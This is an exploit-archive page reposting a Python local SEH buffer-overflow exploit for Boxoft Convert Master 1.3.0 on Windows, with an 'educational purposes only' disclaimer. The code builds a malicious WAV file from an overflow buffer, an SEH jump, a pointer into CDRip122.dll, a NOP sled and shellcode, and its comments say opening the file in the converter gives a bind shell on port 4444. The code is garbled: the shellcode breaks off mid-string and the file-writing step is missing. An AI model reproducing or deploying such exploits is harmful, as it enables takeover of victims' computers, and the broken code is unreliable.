Boxoft convert master 1.3.0 wav seh local exploit Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-11-20 |
Type : local |
Platform : windows
This exploit / vulnerability Boxoft convert master 1.3.0 wav seh local exploit is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
# Date: 17.09.2020
# Vendor Homepage:
# Software Link:
# Exploit Author: Achilles
# Tested Version: 1.3.0
# Tested on: Windows 7 x64
# 1.- Run python code
# 2.- Open Boxoft_Convert_Master.exe
# 3.- Click try and Batch Convert Mode
# 4.- Add Evil.wav
# 5.- And you will have a bind shell port 4444
# 6.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 4132
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x6d00c683) #CDRip122.dll
nops = "\x90" * 20
#Bind=shellcode port 4444
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
payload = buffer + nseh + seh + nops + shellcode
print "[+] Creating %s bytes evil payload.." %len(payload)
print "[+] File created!"
print "File cannot be created"